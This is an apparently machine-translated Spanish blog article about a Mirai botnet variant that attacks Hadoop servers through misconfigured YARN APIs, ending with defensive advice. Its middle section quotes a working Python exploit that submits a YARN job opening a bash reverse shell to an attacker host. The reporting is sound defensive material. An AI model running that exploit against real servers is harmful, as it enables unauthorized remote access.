👇🏽 👋🏻 🐷 Excepto IoT: la botnet Mirai lanzó un ataque en máquinas Linux 👷🏻 💪🏻 💋

La botnet Mirai apareció en 2016 y en poco tiempo logró infectar más de 600 mil dispositivos IoT. La semana pasada se supo acerca de la nueva versión de Mirai, cuyo propósito es servidores Linux con Hadoop. Descubrimos qué vulnerabilidad usa el virus y cómo "cubrirlo".

/ Flickr / DJ Shin / CC BY-SA

Algunas palabras sobre Mirai

Mirai se hizo conocido por una serie de ataques de alto perfil. Uno estaba en el blog del periodista Brian Krebs después de publicar un artículo sobre ventas de botnets. El otro está en el gran proveedor de DNS Dyn , lo que causó un mal funcionamiento en los servicios mundiales: Twitter, Reddit, PayPal, GitHub y muchos otros.

Para "capturar" dispositivos IoT, la botnet utilizó una vulnerabilidad de contraseña débil (los fabricantes los hicieron iguales para todos los dispositivos inteligentes). El malware monitoreó Internet para detectar puertos telnet abiertos e ingresó por fuerza bruta los pares conocidos de inicio de sesión y contraseña para acceder a la cuenta del propietario del dispositivo. Si tiene éxito, el dispositivo se convirtió en parte de la "red maliciosa".

A finales de 2016, los desarrolladores publicaron el código fuente del virus en la red. Esto condujo a la aparición de varias versiones más de software malicioso, pero todos hicieron de su objetivo el dispositivo de Internet de las cosas. Hasta hace poco, ahora surgió el gusano Mirai, que ataca los servidores Linux en los centros de datos.

Botnet "recluta" Linux

El informe sobre la nueva versión de Mirai fue publicado por especialistas en seguridad de la información en NETSCOUT. Se sabe que una botnet ataca servidores con el marco Apache Hadoop instalado. Como dicen los expertos en seguridad, los piratas informáticos se sienten atraídos por el poder del hierro. Hadoop se utiliza en servidores informáticos de alto rendimiento y algoritmos de aprendizaje automático. Una red de dispositivos productivos permitirá ataques DDoS más destructivos.

La versión de Mirai para Linux sigue pirateando sistemas con credenciales de fábrica de telnet. Pero ahora el programa no necesita distinguir entre diferentes tipos de arquitecturas de dispositivos IoT, Mirai ataca solo servidores con procesadores x86.

Al mismo tiempo, la nueva botnet no instala malware en el dispositivo pirateado por sí solo. El gusano envía a los atacantes la dirección IP de la máquina vulnerable y un par de nombre de usuario y contraseña para ello. Luego, los hackers instalan los bots DDoS manualmente.

¿Qué vulnerabilidad se utiliza?

El malware aprovecha la vulnerabilidad del módulo YARN, que es responsable de administrar los recursos del clúster y programar tareas en Apache Hadoop, para infiltrarse en el servidor.

Si la configuración de YARN es incorrecta, el atacante puede obtener acceso a la API REST interna del sistema a través de los puertos 8088 y 8090. Al conectarse de forma remota, un atacante puede agregar una nueva aplicación al clúster. Por cierto, este problema se conoce desde hace varios años: se han publicado exploits de PoC en ExploitDB y GitHub .

Por ejemplo, el siguiente código de explotación se presenta en GitHub:

#!/usr/bin/env python import requests target = 'http://127.0.0.1:8088/' lhost = '192.168.0.1' # put your local host ip here, and listen at port 9999 url = target + 'ws/v1/cluster/apps/new-application' resp = requests.post(url) app_id = resp.json()['application-id'] url = target + 'ws/v1/cluster/apps' data = { 'application-id': app_id, 'application-name': 'get-shell', 'am-container-spec': { 'commands': { 'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost, }, }, 'application-type': 'YARN', } requests.post(url, json=data)

Además de Mirai, esta vulnerabilidad es utilizada por otro bot DDoS: DemonBot, que los especialistas de Radware descubrieron en octubre. Desde principios de otoño, han registrado más de un millón de intentos de piratería a través de la vulnerabilidad YARN diariamente.

Lo que dicen los expertos

Según los expertos en seguridad de la información, la mayoría de los intentos fueron pirateados en Estados Unidos, Gran Bretaña, Italia y Alemania. A principios de mes, más de mil servidores en todo el mundo se vieron afectados por vulnerabilidades en YARN. Esto no es mucho, pero todos tienen un alto poder de cómputo.

También hay información de que una vulnerabilidad en Hadoop podría proporcionar a los atacantes acceso a los datos almacenados en servidores inseguros. Hasta el momento, no se han reportado tales casos, pero los expertos advierten que esto es solo cuestión de tiempo.

La nueva versión de Mirai no se está extendiendo rápidamente: todos los días solo hay varias decenas de miles de intentos de descifrar las máquinas Hadoop a través de YARN. Además, todos los ataques provienen de una pequeña cantidad de direcciones IP, no más de cuarenta.

/ Flickr / Jelene Morris / CC BY

Tal comportamiento de los atacantes llevó a los especialistas de NETSCOUT a la idea de que el virus no se propaga automáticamente: los hackers escanean manualmente Internet e implementan el programa en máquinas desprotegidas. Esto significa que los propietarios de servidores con Hadoop instalado tienen más tiempo para cerrar la vulnerabilidad.

Para protegerse contra los ataques, debe cambiar la configuración de seguridad de la red. Es suficiente para los administradores restringir el acceso al clúster informático: para configurar filtros IP o cerrar completamente la red de usuarios y aplicaciones externos.

Para evitar el acceso no autorizado al sistema, los expertos en seguridad también recomiendan actualizar Hadoop a la versión 2.xy habilitar la autenticación a través del protocolo Kerberos.

Varias publicaciones del blog VAS Experts:

Un par de materiales frescos de nuestro blog sobre Habré:

Excepto IoT: la botnet Mirai lanzó un ataque en máquinas Linux

Algunas palabras sobre Mirai

Botnet "recluta" Linux

¿Qué vulnerabilidad se utiliza?

Lo que dicen los expertos

More articles: